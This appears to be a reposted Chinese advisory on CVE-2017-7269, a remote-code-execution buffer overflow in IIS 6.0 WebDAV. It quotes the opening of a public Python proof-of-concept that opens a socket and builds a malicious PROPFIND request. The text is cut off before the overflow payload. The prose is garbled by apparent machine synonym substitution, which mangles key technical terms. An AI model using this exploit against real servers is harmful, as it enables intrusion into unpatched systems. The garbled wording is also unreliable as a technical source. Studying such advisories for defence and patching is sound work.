IIS 6.0 长途代码履行0day,编号:CVE-2017-7269 (附PoC)
缝隙描绘
缝隙编号:CVE-2017-7269
发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)
缝隙简述:敞开WebDAV服务的IIS 6.0被爆存在缓存区溢出缝隙导致长途代码履行,现在对于 Windows Server 2003 R2 可以稳定运用,该缝隙最早在2016年7,8月份开端在野外被运用。
缝隙类型:缓冲区溢出
缝隙等级:高危
影响商品:Microsoft Windows Server 2003 R2 敞开WebDAV服务的IIS6.0(现在已验证,别的版本尚未验证)
触发函数:ScStoragePathFromUrl函数
附加信息:ScStoragePathFromUrl函数被调用了两次
缝隙细节:在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出缝隙,攻击者经过一个以“If:
PoC(来源网络https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py)
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If:
|